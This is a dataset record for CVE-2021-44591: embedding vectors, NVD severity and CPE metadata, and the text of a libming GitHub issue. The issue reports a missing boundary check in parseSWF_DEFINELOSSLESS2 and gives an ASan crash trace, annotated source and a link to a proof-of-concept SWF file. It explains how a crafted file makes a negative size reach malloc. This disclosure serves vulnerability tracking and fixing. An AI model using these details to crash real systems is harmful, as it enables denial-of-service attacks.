0.005405298434197903, 0.002046199981123209, -0.018034739419817924, 0.013748073019087315, -0.002954554744064808, -0.02204815112054348, 0.01658307947218418, 0.0012979547027498484, 0.011527887545526028, 0.0025937745813280344, -0.010921605862677097, 0.019640104845166206, 0.008620298467576504, 0.008991751819849014, 0.00802682526409626, -0.025959094986319542, -0.010725204832851887, -0.022902069613337517, -0.013380888849496841, 0.0007936096517369151, 0.006967967376112938, -0.02150164544582367, -0.004316553473472595, -0.036137793213129044, -0.023482734337449074, 0.000396271119825542, 0.0024870350025594234, 0.009606572799384594, 0.021962760016322136, -0.0010834079002961516, -0.004361384082585573, -0.030792267993092537, 0.007501665968447924, 0.07562293857336044, -0.0023610820062458515, -0.013551671989262104, 0.01484108716249466, 0.004162847995758057, -0.020374473184347153, -0.014704461209475994, 0.060628149658441544, 0.00372735015116632, 0.01820552349090576, 0.011673053726553917, 0.013457740657031536, 0.0018775513162836432, -0.009555337950587273, -0.015319281257689, -0.01271483302116394, 0.021706584841012955, -0.0037892593536525965, -0.015208272263407707, 0.01945224218070507, -0.002546809148043394, 0.006716061849147081, 0.008056712336838245, -0.010187236592173576, 0.005413837265223265, -0.009290623478591442, -0.005243054125458002, -0.023875536397099495, 0.003733754623681307, 0.02261173725128174, -0.016642853617668152, -0.0013950878055766225, -0.0025446743238717318, -0.002399508375674486, -0.005934727378189564, 0.015882866457104683, 0.016429373994469643, 0.023465655744075775, -0.0112290158867836, -0.014892322942614555, 0.02394384890794754, 0.001956538762897253, 0.004884408786892891, -0.003981390502303839, 0.018051818013191223, -0.0010444479994475842, -0.017915191128849983, 0.008812429383397102, 0.0030036550015211105, -0.0050124963745474815, 0.0038810553960502148, 0.00287556741386652, 0.005029574502259493, -0.010187236592173576, 0.010537343099713326, 0.0018231139983981848, -0.0020376609172672033, -0.01169867068529129, 0.01298808678984642, -0.0078090764582157135, 0.006989315617829561, -0.013517515733838081, -0.015327820554375648, 0.001671543694101274, 0.0033964572940021753, -0.006647748406976461, -0.017932269722223282, -0.0019853583071380854, -0.01747969351708889, -0.007437622174620628, -0.00795851182192564, -0.017778564244508743, -0.01771024987101555, -0.009751738980412483, 0.005038113798946142, -0.000545439834240824, 0.010733744129538536, 0.012842920608818531, -0.005883492063730955, -0.004314418416470289, -0.0030676990281790495, -0.004598346073180437, -0.016139041632413864, 0.019418084993958473, -0.0014132335782051086, 0.012706293724477291, 0.007992669008672237, -0.019025282934308052, -0.021518724039196968, 0.016378140076994896, -0.0032726391218602657, 0.006007310003042221, -0.01648060977458954, -0.018717873841524124, 0.0028221975080668926, -0.0001698495470918715, 0.020049985498189926, 0.001420705346390605, 0.0017185091273859143, -0.019674262031912804, -0.005110696889460087, 0.008752655237913132, -0.00911130104213953, -0.010153080336749554, -0.0050466530956327915, 0.0149777140468359, 0.008176260627806187, -0.00010333737009204924, 0.003994199447333813, -0.014064022339880466, 0.0017878899816423655, 0.010400716215372086, -0.009606572799384594, -0.004747781902551651, 0.008722768165171146, -0.0035096013452857733, 0.008731307461857796, -0.003212864976376295, 0.006237867753952742, -0.02855500392615795, 0.01217686478048563, 0.017624858766794205, 0.005290019325911999, 0.005200358107686043, -0.0035394884180277586, -0.00037145413807593286, 0.0025041133631020784, -0.016395216807723045, -0.00844524521380663, 0.023909691721200943, 0.016002414748072624, -0.010708126239478588, -0.001682217582128942, 0.007544361986219883, 0.014542216435074806, 0.0005155527614988387, -0.0039109424687922, 0.0016832849942147732, -0.018717873841524124, 0.00455138087272644, 0.006506851874291897, -0.0015840170672163367, 0.011203398928046227, -0.003708137199282646, 0.003804202890023589, 0.01557545643299818, -0.011468113400042057, -0.005418106913566589, 0.024251259863376617, -0.0014110987540334463, 0.0001964010443771258, 0.005140583962202072, 0.014431207440793514, -0.010178697295486927, 0.0015541299944743514, -0.016574541106820107, -0.026590993627905846, -0.0012445849133655429, 0.013286957517266273, 0.017488231882452965, -0.0035672406665980816, 0.009333319030702114, 0.023072853684425354, 0.023841379210352898, 0.01808597519993782, -0.022936226800084114, 0.006963697727769613, -0.007151559926569462, 0.00870142038911581, -0.009427250362932682, 0.010639812797307968, -0.005281480029225349, 0.0017377223121002316, 0.012475735507905483, 0.004197004716843367, -0.003118933876976371, -0.005153392441570759, -0.009580954909324646, -0.012808763422071934, -0.014200649224221706, -0.017727328464388847, 0.010323863476514816, 0.01781272143125534, 0.0448819063603878, 0.008159182965755463, 0.02693255990743637, 0.01217686478048563, 0.01531074196100235, -0.004453180357813835, -0.017932269722223282, 0.0021668158005923033, 0.028896570205688477, -0.005533386021852493, -0.013560211285948753, -0.015199732966721058, 0.01597679778933525, 0.0027496146503835917, -0.0034967924002557993, -0.02042570896446705, 0.005909109488129616, 0.0014580643037334085, -0.0005278278258629143, 0.02800849638879299, 0.009760278277099133, 0.0015914889518171549, 0.03975840285420418, -0.002785906195640564, 0.0011901475954800844, -0.016557462513446808, -0.019281459972262383, 0.01708689145743847 ]
CVE-2021-44591
2022-01-06T14:15:07.917000
In libming 0.4.8, the parseSWF_DEFINELOSSLESS2 function in util/parser.c lacks a boundary check that would lead to denial-of-service attacks via a crafted SWF file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libming/libming" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/235" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/235
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
version: master(commit [04aee52](https://github.com/libming/libming/commit/04aee52363688426eab74f5d6180c149654a6473) ) command: listswf $FILE ``` root:/path_to_libming/build/bin# ./listswf poc ==26225==WARNING: AddressSanitizer failed to allocate 0xfffffffffffffff9 bytes ==26225==AddressSanitizer's allocator is terminating the process instead of returning 0 ==26225==If you don't like this behavior set allocator_may_return_null=1 ==26225==AddressSanitizer CHECK failed: /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 "((0)) != (0)" (0x0, 0x0) #0 0x4e3385 in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_rtl.cc:69 #1 0x500c45 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:79 #2 0x4e9786 in __sanitizer::ReportAllocatorCannotReturnNull() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 #3 0x4e97c6 in __sanitizer::ReturnNullOrDieOnFailure::OnBadRequest() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:241 #4 0x41f676 in __asan::asan_malloc(unsigned long, __sanitizer::BufferedStackTrace*) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_allocator.cc:856 #5 0x4da20b in malloc /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:89 #6 0x5b7e7e in readBytes /path_to_libming/util/read.c:252:17 #7 0x59b963 in parseSWF_DEFINELOSSLESS2 /path_to_libming/util/parser.c:2168:38 #8 0x546cf9 in blockParse /path_to_libming/util/blocktypes.c:145:14 #9 0x53bc13 in readMovie /path_to_libming/util/main.c:269:11 #10 0x53a0d6 in main /path_to_libming/util/main.c:354:2 #11 0x7fce52d93bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x41a2f9 in _start (/path_to_libming/build/bin/listswf+0x41a2f9) ``` The cause of this bug is the lack of boundary checks. Specifically, in the `parseSWF_DEFINELOSSLESS2` function, the size of `end` and `fileOffset` is not compared when `readBytes` is called. As a result, `end-fileOffset` may be a negative integer, which eventually leads to allocation failure. The detailed call chain analysis is as follows. Download [poc](https://github.com/dandanxu96/PoC/blob/7cbf5b7f7b62e4a95725a226b29cae362b425ec8/libming/parseSWF_DEFINELOSSLESS2-readBytes-malloc-failure-poc) ```C static void readMovie(FILE *f) { int block, type, length, nextFrame=0; SWF_Parserstruct *blockp; for (;;) { if(filelen_check_fails(2)) break; // Read 16 bits from the input file, the block is controlled by the attacker block = readUInt16 (f); type = block >> 6; // length = block & 0x3f, which means length<=3f length = block & ((1 << 6) - 1); if (length == 63) /* it's a long block. */ { if(filelen_check_fails(4)) break; unsigned long real_length = readUInt32 (f); if (real_length > INT_MAX) { SWF_warn(" Could not process long block with length %lu:" " blocks with length > %d not supported on this system\n", real_length, INT_MAX); continue; } else { length = (int) real_length; } } nextFrame = fileOffset+length; if(filelen_check_fails(length)) break; blockp= blockParse(f, length, type); ...... } ...... } SWF_Parserstruct * blockParse (FILE *f, int length, SWFBlocktype header) { int i; for (i = 0; i < numBlocks; i++) { // Select the corresponding parser to parse if (blocks[i].type == header) { return blocks[i].parser(f,length); } } return parseSWF_UNKNOWNBLOCK(f, length); } SWF_Parserstruct * parseSWF_DEFINELOSSLESS2 (FILE * f, int length) { int end = fileOffset + length; PAR_BEGIN (SWF_DEFINELOSSLESS2); parserrec->CharacterID = readUInt16 (f); // Read 16 bits from the input file, and fileOffset = fileOffset+2 parserrec->BitmapFormat = readUInt8 (f); // Read 8 bits from the input file, and fileOffset = fileOffset+1 parserrec->BitmapWidth = readUInt16 (f); // Read 16 bits from the input file, and fileOffset = fileOffset+2 parserrec->BitmapHeight = readUInt16 (f); Read 16 bits from the input file, and fileOffset = fileOffset+2 if( parserrec->BitmapFormat == 3 /* 8-bit */ ) { parserrec->BitmapColorTableSize = readUInt8 (f); } // When length=0, at this moment end=Old_fileOffset, fileOffset=Old_fileOffset+7, then end-fileOffset will be equal to -7 which is a negative integer parserrec->ZlibBitmapData = (UI8 *)readBytes (f,end-fileOffset); PAR_END; } char *readBytes(FILE *f, unsigned long size) { if (size < 1) { #if DEBUG SWF_warn("readBytes: want to read %lu < 1 bytes: Handling a 0\n", size); #endif size = 0; } unsigned long i; char *buf; // The parameter size's type is unsigned long. Given a negative integer as input, it will be treated as a large unsigned integer and passed to malloc, causing allocation failures. buf = (char *)malloc(sizeof(char)*size); if (buf == NULL) { fprintf(stderr, "readBytes: Failed to allocate %lu bytes", sizeof(char) * size); exit(-1); } for(i=0;i<size;i++) { buf[i]=(char)readUInt8(f); } return buf; } ```
Memory allocation failure caused by the missing boundary check in parseSWF_DEFINELOSSLESS2
https://api.github.com/repos/libming/libming/issues/235/comments
0
2021-12-01T05:31:44
2021-12-01T05:31:44Z
https://github.com/libming/libming/issues/235
1,067,981,255
235
true
This is a GitHub Issue repo:libming owner:libming Title : Memory allocation failure caused by the missing boundary check in parseSWF_DEFINELOSSLESS2 Issue date: --- start body --- version: master(commit [04aee52](https://github.com/libming/libming/commit/04aee52363688426eab74f5d6180c149654a6473) ) command: listswf $FILE ``` root:/path_to_libming/build/bin# ./listswf poc ==26225==WARNING: AddressSanitizer failed to allocate 0xfffffffffffffff9 bytes ==26225==AddressSanitizer's allocator is terminating the process instead of returning 0 ==26225==If you don't like this behavior set allocator_may_return_null=1 ==26225==AddressSanitizer CHECK failed: /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 "((0)) != (0)" (0x0, 0x0) #0 0x4e3385 in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_rtl.cc:69 #1 0x500c45 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:79 #2 0x4e9786 in __sanitizer::ReportAllocatorCannotReturnNull() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:225 #3 0x4e97c6 in __sanitizer::ReturnNullOrDieOnFailure::OnBadRequest() /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:241 #4 0x41f676 in __asan::asan_malloc(unsigned long, __sanitizer::BufferedStackTrace*) /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_allocator.cc:856 #5 0x4da20b in malloc /mnt/d/CLib/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:89 #6 0x5b7e7e in readBytes /path_to_libming/util/read.c:252:17 #7 0x59b963 in parseSWF_DEFINELOSSLESS2 /path_to_libming/util/parser.c:2168:38 #8 0x546cf9 in blockParse /path_to_libming/util/blocktypes.c:145:14 #9 0x53bc13 in readMovie /path_to_libming/util/main.c:269:11 #10 0x53a0d6 in main /path_to_libming/util/main.c:354:2 #11 0x7fce52d93bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x41a2f9 in _start (/path_to_libming/build/bin/listswf+0x41a2f9) ``` The cause of this bug is the lack of boundary checks. Specifically, in the `parseSWF_DEFINELOSSLESS2` function, the size of `end` and `fileOffset` is not compared when `readBytes` is called. As a result, `end-fileOffset` may be a negative integer, which eventually leads to allocation failure. The detailed call chain analysis is as follows. Download [poc](https://github.com/dandanxu96/PoC/blob/7cbf5b7f7b62e4a95725a226b29cae362b425ec8/libming/parseSWF_DEFINELOSSLESS2-readBytes-malloc-failure-poc) ```C static void readMovie(FILE *f) { int block, type, length, nextFrame=0; SWF_Parserstruct *blockp; for (;;) { if(filelen_check_fails(2)) break; // Read 16 bits from the input file, the block is controlled by the attacker block = readUInt16 (f); type = block >> 6; // length = block & 0x3f, which means length<=3f length = block & ((1 << 6) - 1); if (length == 63) /* it's a long block. */ { if(filelen_check_fails(4)) break; unsigned long real_length = readUInt32 (f); if (real_length > INT_MAX) { SWF_warn(" Could not process long block with length %lu:" " blocks with length > %d not supported on this system\n", real_length, INT_MAX); continue; } else { length = (int) real_length; } } nextFrame = fileOffset+length; if(filelen_check_fails(length)) break; blockp= blockParse(f, length, type); ...... } ...... } SWF_Parserstruct * blockParse (FILE *f, int length, SWFBlocktype header) { int i; for (i = 0; i < numBlocks; i++) { // Select the corresponding parser to parse if (blocks[i].type == header) { return blocks[i].parser(f,length); } } return parseSWF_UNKNOWNBLOCK(f, length); } SWF_Parserstruct * parseSWF_DEFINELOSSLESS2 (FILE * f, int length) { int end = fileOffset + length; PAR_BEGIN (SWF_DEFINELOSSLESS2); parserrec->CharacterID = readUInt16 (f); // Read 16 bits from the input file, and fileOffset = fileOffset+2 parserrec->BitmapFormat = readUInt8 (f); // Read 8 bits from the input file, and fileOffset = fileOffset+1 parserrec->BitmapWidth = readUInt16 (f); // Read 16 bits from the input file, and fileOffset = fileOffset+2 parserrec->BitmapHeight = readUInt16 (f); Read 16 bits from the input file, and fileOffset = fileOffset+2 if( parserrec->BitmapFormat == 3 /* 8-bit */ ) { parserrec->BitmapColorTableSize = readUInt8 (f); } // When length=0, at this moment end=Old_fileOffset, fileOffset=Old_fileOffset+7, then end-fileOffset will be equal to -7 which is a negative integer parserrec->ZlibBitmapData = (UI8 *)readBytes (f,end-fileOffset); PAR_END; } char *readBytes(FILE *f, unsigned long size) { if (size < 1) { #if DEBUG SWF_warn("readBytes: want to read %lu < 1 bytes: Handling a 0\n", size); #endif size = 0; } unsigned long i; char *buf; // The parameter size's type is unsigned long. Given a negative integer as input, it will be treated as a large unsigned integer and passed to malloc, causing allocation failures. buf = (char *)malloc(sizeof(char)*size); if (buf == NULL) { fprintf(stderr, "readBytes: Failed to allocate %lu bytes", sizeof(char) * size); exit(-1); } for(i=0;i<size;i++) { buf[i]=(char)readUInt8(f); } return buf; } ``` --- end body ---
5,950
[ -0.02557891234755516, 0.028893867507576942, -0.008541236631572247, 0.008018608205020428, 0.05886285752058029, 0.011258902959525585, -0.02866988442838192, 0.027549967169761658, -0.03314955532550812, 0.0248024370521307, -0.005614519119262695, 0.01193831954151392, 0.021786125376820564, 0.011826327070593834, 0.008130599744617939, -0.012505743652582169, -0.01404376421123743, -0.0038861131761223078, -0.0027960604056715965, -0.00830232072621584, 0.02245807647705078, -0.018396509811282158, -0.023861706256866455, 0.030909718945622444, -0.023130027577280998, 0.011930853128433228, -0.007275729905813932, -0.0114903524518013, 0.0020718472078442574, 0.0076079717837274075, -0.0009295314084738493, 0.015902826562523842, -0.02548931911587715, 0.006857627537101507, 0.03888352960348129, -0.015208478085696697, 0.050769586116075516, 0.042049165815114975, -0.0038338503800332546, 0.019068459048867226, -0.007410119753330946, -0.040496211498975754, -0.01920284889638424, 0.020367564633488655, -0.016261199489235878, 0.022443143650889397, 0.004087698180228472, -0.02044222503900528, -0.049903519451618195, 0.010960257612168789, 0.013155296444892883, -0.009765679016709328, -0.02910291962325573, -0.053278204053640366, 0.02922237664461136, -0.015208478085696697, 0.039391227066516876, 0.018665289506316185, 0.011034918949007988, 0.0071152085438370705, -0.02419021539390087, -0.00040340356645174325, 0.027594763785600662, 0.03398576006293297, 0.006607512477785349, -0.003901045536622405, -0.031059041619300842, 0.02981966733932495, -0.014566391706466675, 0.008220193907618523, -0.0022174364421516657, -0.04509533941745758, 0.022741788998246193, 0.013005973771214485, -0.003188031492754817, -0.010967724025249481, 0.04407994821667671, 0.018112797290086746, -0.007869286462664604, 0.04936595633625984, -0.03485182672739029, 0.021860787644982338, -0.031088905408978462, 0.009989663027226925, 0.035986676812171936, 0.022323686629533768, -0.008093269541859627, -0.0662393793463707, -0.013931771740317345, -0.04258672520518303, 0.006775500252842903, 0.012505743652582169, 0.03556857630610466, 0.021905584260821342, -0.002568343887105584, 0.013849644921720028, -0.027818746864795685, -0.004468470346182585, -0.07537790387868881, -0.005976625718176365, -0.03718125820159912, 0.021009650081396103, -0.014947163872420788, 0.007891684770584106, 0.009638755582273006, 0.03144728019833565, -0.02208477072417736, -0.009474501013755798, 0.023458536714315414, 0.13486792147159576, 0.025429589673876762, 0.008115667849779129, -0.03792786970734596, 0.019695613533258438, -0.009989663027226925, 0.03718125820159912, 0.02554904855787754, -0.009332644753158092, -0.04745463281869888, 0.003432546742260456, -0.008376982063055038, 0.00013532335287891328, -0.026146337389945984, 0.015320469625294209, -0.03282104432582855, 0.049067314714193344, 0.02121870033442974, -0.044796694070100784, -0.019352171570062637, -0.041093502193689346, -0.027759019285440445, -0.04264645278453827, 0.0229807049036026, -0.012543074786663055, 0.014663451351225376, 0.009676085785031319, -0.021054446697235107, 0.016320928931236267, 0.02690788172185421, 0.003964507486671209, -0.025190673768520355, -0.02029290236532688, 0.010788537561893463, -0.008727889508008957, -0.029282106086611748, 0.02381690964102745, -0.023592926561832428, 0.013909373432397842, -0.017172066494822502, 0.026116473600268364, -0.005356938112527132, -0.015499656088650227, 0.025623708963394165, 0.006237939931452274, 0.02384677343070507, -0.008347117342054844, 0.02523547224700451, 0.05569722503423691, 0.008429245091974735, -0.043930623680353165, 0.033418335020542145, -0.030416956171393394, 0.029924191534519196, -0.02771422266960144, -0.01231162529438734, -0.005192683544009924, 0.012423616833984852, 0.011654607020318508, -0.0013215024955570698, 0.03120836429297924, 0.020800597965717316, 0.018351713195443153, 0.005091891158372164, -0.009907535277307034, -0.03986905887722969, -0.019964393228292465, -0.00557345524430275, 0.03747989982366562, -0.031596601009368896, -0.01954629085958004, -0.004405008163303137, 0.023085229098796844, -0.00415116036310792, 0.005957960616797209, -0.02424994483590126, -0.04222835227847099, 0.01753043942153454, -0.03977946564555168, 0.009997129440307617, -0.013782449997961521, -0.0018497301498427987, 0.0027269988786429167, -0.0013084367383271456, -0.0039122444577515125, 0.04882839694619179, -0.005711578764021397, -0.033418335020542145, -0.03279118239879608, 0.008466575294733047, -0.004867907613515854, 0.007634103298187256, -0.0152308763936162, -0.017620032653212547, 0.020277971401810646, -0.050889045000076294, 0.004229554440826178, -0.04682747647166252, 0.013334482908248901, 0.00960142444819212, -0.02990926057100296, 0.0029677809216082096, 0.0026299392338842154, 0.01573857292532921, 0.007100276183336973, -0.024130485951900482, 0.015208478085696697, -0.007219734136015177, 0.030640939250588417, -0.024951759725809097, -0.02554904855787754, 0.045603036880493164, -0.006013956386595964, 0.0035090744495391846, -0.006028888281434774, -0.061341606080532074, -0.0024694178719073534, -0.029252242296934128, 0.015380198135972023, -0.03485182672739029, 0.005043361335992813, 0.025683438405394554, -0.010997588746249676, -0.019994258880615234, 0.01726165972650051, 0.015559385530650616, 0.00042626855429261923, -0.008354583755135536, -0.00821272749453783, 0.00042813507025130093, 0.009974731132388115, 0.019740410149097443, 0.015133816748857498, 0.012393752112984657, -0.027505170553922653, -0.001522154314443469, 0.047365039587020874, -0.03876407444477081, -0.001618280541151762, -0.029028257355093956, 0.016679301857948303, 0.01040776539593935, -0.013140363618731499, 0.013834713026881218, -0.01111704669892788, 0.006398461293429136, 0.006585114169865847, 0.018515966832637787, 0.0029995120130479336, -0.030297497287392616, -0.026758559048175812, 0.02768435701727867, 0.0033672181889414787, -0.01688835397362709, 0.005513726733624935, -0.0010816535213962197, 0.02474270761013031, -0.00447593629360199, 0.033567655831575394, 0.017112337052822113, -0.006745635531842709, 0.045543305575847626, -0.015529520809650421, 0.005853434558957815, -0.02529519982635975, -0.01368539035320282, -0.006585114169865847, -0.004494601860642433, 0.0037722550332546234, 0.01343900803476572, -0.021517345681786537, 0.008123134262859821, 0.010893062688410282, -0.011998048052191734, 0.03135768696665764, 0.004774581175297499, -0.028714681044220924, 0.0058609009720385075, -0.018202390521764755, -0.015148748643696308, -0.00643205875530839, 0.00047923129750415683, -0.02941649593412876, -0.033567655831575394, -0.002308896277099848, 0.0019486561650410295, 0.039421092718839645, 0.011266368441283703, 0.013073168694972992, -0.03924190625548363, -0.028460834175348282, -0.0071973358280956745, -0.016679301857948303, -0.0046065934002399445, -0.01633586175739765, -0.014140822924673557, -0.0130657022818923, 0.0031003046315163374, 0.00011409158469177783, -0.0056593157351017, -0.02226395718753338, 0.0173213891685009, -0.05124741792678833, -0.009175856597721577, -0.00643205875530839, -0.02217436395585537, -0.01049735862761736, 0.04249713197350502, -0.03580749034881592, -0.017485642805695534, 0.008324719034135342, -0.015424995683133602, 0.010706409811973572, -0.0019971858710050583, 0.02595221810042858, 0.031775787472724915, 0.007596772629767656, -0.033567655831575394, 0.060236621648073196, -0.04533425346016884, -0.007973811589181423, -0.030730532482266426, -0.0005198282888159156, -0.03936136141419411, -0.02768435701727867, -0.01014645118266344, -0.04013783857226372, 0.012281760573387146, 0.018232254311442375, -0.00002690426481422037, 0.018635425716638565, -0.022189296782016754, -0.009847806766629219, -0.011900988407433033, -0.0036005342844873667, -0.026668965816497803, -0.015469792298972607, -0.012916380539536476, -0.022816449403762817, 0.012446015141904354, -0.002167040016502142, 0.0010125919943675399, 0.03739030659198761, 0.03195497393608093, 0.021457616239786148, -0.008944407105445862, -0.031865380704402924, -0.022189296782016754, 0.00674190279096365, 0.0007452116697095335, 0.012655066326260567, -0.008742821402847767, -0.011744200251996517, -0.035180337727069855, 0.00651791924610734, 0.01636572554707527, -0.00893694069236517, 0.0286400206387043, -0.010243510827422142, -0.027355847880244255, 0.0029379166662693024, -0.0027848612517118454, 0.04270618408918381, -0.02217436395585537, 0.05038134753704071, -0.0017200064612552524, -0.023488400503993034, 0.03986905887722969, 0.00000472829697173438, -0.04315415024757385, 0.03655410185456276, -0.043781302869319916, 0.021099243313074112, 0.01277452427893877, -0.050022974610328674, 0.024145418778061867, 0.00464765727519989, -0.010318172164261341, 0.041302554309368134, 0.009653687477111816, -0.010810935869812965, -0.05354698374867439, 0.034164946526288986, -0.027072135359048843, -0.053278204053640366, -0.012752125971019268, 0.03452331945300102, 0.0075930398888885975, -0.02965541183948517, 0.024668047204613686, -0.043870896100997925, 0.007473581936210394, -0.0029285838827490807, 0.040257297456264496, 0.0006140880286693573, 0.0009855272946879268, 0.05300942063331604, 0.027296118438243866, -0.030581209808588028, 0.012565473094582558, -0.01654491201043129, 0.037002068012952805, -0.03219389170408249, -0.030581209808588028, 0.013528602197766304, 0.04449804872274399, 0.058474618941545486, -0.033448196947574615, -0.030566278845071793, -0.0052300142124295235, 0.026952678337693214, -0.012319090776145458, -0.022756721824407578, 0.031716059893369675, 0.012371353805065155, 0.01896393485367298, 0.0003681728267110884, 0.003238427685573697, 0.020248105749487877, 0.01694808341562748, -0.0281472560018301, -0.04369170963764191, 0.04276591166853905, 0.019396968185901642, 0.002952848793938756, -0.009377441368997097, -0.011647140607237816, -0.016963014379143715, -0.018814612179994583, -0.023712383583188057, -0.0018366645090281963, 0.0024395533837378025, 0.0356283038854599, -0.027012407779693604, -0.01104238536208868, 0.002432087203487754, -0.048947855830192566, 0.0012804388534277678, 0.003705059876665473, 0.03413508087396622, -0.010527223348617554, -0.013274753466248512, 0.018949002027511597, 0.008884677663445473, 0.006245405878871679, 0.03374684229493141, -0.0187996793538332, -0.002594475168734789, -0.03216402605175972, 0.008018608205020428, 0.008541236631572247, 0.017515508458018303, 0.02941649593412876, -0.018232254311442375, -0.004356478340923786, 0.02999885380268097, 0.060505401343107224, 0.006782966200262308, -0.013819780200719833, 0.009071330539882183, -0.02520560659468174, 0.01564897783100605, 0.008548703044652939, 0.004811911843717098, -0.030237769708037376, 0.024668047204613686, 0.020248105749487877, -0.008242592215538025, -0.017336320132017136, 0.02526533603668213, -0.03192511200904846, 0.004468470346182585, -0.041242823004722595, -0.022308753803372383, -0.02947622537612915, 0.03989892452955246, -0.011617275886237621, -0.026922812685370445, 0.0056257182732224464, 0.011945785023272038, 0.005140420515090227, 0.019158052280545235, 0.0015025557950139046, -0.006529118400067091, -0.018949002027511597, -0.005144153721630573, 0.02448885887861252, -0.039540547877550125, -0.031029177829623222, 0.038704343140125275, 0.00330935581587255, -0.003859981894493103, 0.018441306427121162, 0.019187917932868004, -0.009788078255951405, 0.016231335699558258, -0.019038595259189606, -0.034403860569000244, 0.02572823502123356, -0.03846542909741402, -0.052651047706604004, -0.019098324701189995, -0.03407535329461098, 0.04506547376513481, -0.04363198205828667, 0.009153458289802074, -0.02124856598675251, 0.006454457063227892, -0.009892603382468224, 0.035329658538103104, 0.006768033839762211, -0.011736733838915825, -0.019815070554614067, -0.022502873092889786, 0.027639560401439667, 0.020218241959810257, 0.01224442943930626, 0.02384677343070507, -0.010086722671985626, 0.0023294282145798206, -0.030790261924266815, -0.02734091691672802, 0.01122903823852539, -0.015193545259535313, 0.03219389170408249, 0.0010760539444163442, 0.004539398476481438, -0.010280841030180454, 0.006013956386595964, -0.0048343101516366005, 0.0010321905137971044, -0.00951183121651411, 0.03733057901263237, -0.03482196480035782, 0.00706667872145772, -0.037031933665275574, 0.006700838916003704, 0.004961234051734209, 0.00873535592108965, 0.01178153045475483, 0.014812774024903774, 0.009317712858319283, -0.010601884685456753, 0.011482886038720608, 0.0033354873303323984, -0.011624742299318314, 0.01827705092728138, -0.0094968993216753, 0.007021882105618715, 0.02635538950562477, 0.020248105749487877, 0.023772113025188446, -0.007316793315112591, -0.00018000337877310812, -0.002495549153536558, -0.012707329355180264, -0.012983575463294983, 0.0048492420464754105, 0.027072135359048843, -0.02808752842247486, -0.006446991115808487, 0.014805307611823082, -0.014805307611823082, 0.010616816580295563, -0.011482886038720608, -0.020890191197395325, 0.02777395024895668, -0.003953308332711458, -0.0011927119921892881, 0.008645761758089066, -0.025877557694911957, 0.013648059219121933, -0.02548931911587715, 0.007637836504727602, 0.030043650418519974, 0.018053067848086357, -0.030730532482266426, 0.008160464465618134, -0.0005398935172706842, 0.015753503888845444, -0.00706667872145772, 0.0006178210605867207, 0.011034918949007988, 0.002932317089289427, 0.00015095552953425795, -0.005872100125998259, -0.01278945617377758, -0.007186136674135923, -0.008391913957893848, 0.026295660063624382, 0.004490868654102087, -0.0025104815140366554, 0.008996669203042984, 0.01387204322963953, -0.030820125713944435, -0.018844475969672203, 0.00212597637437284, 0.02557891234755516, 0.03831610456109047, -0.01342407613992691, 0.010586951859295368, 0.015454859472811222, -0.009967264719307423, 0.029267173260450363, -0.003524006577208638, 0.003298156661912799, -0.03912244737148285, 0.012647599913179874, -0.009422237984836102, -0.004315414931625128, 0.022771652787923813, -0.0025496785528957844, -0.03529979661107063, 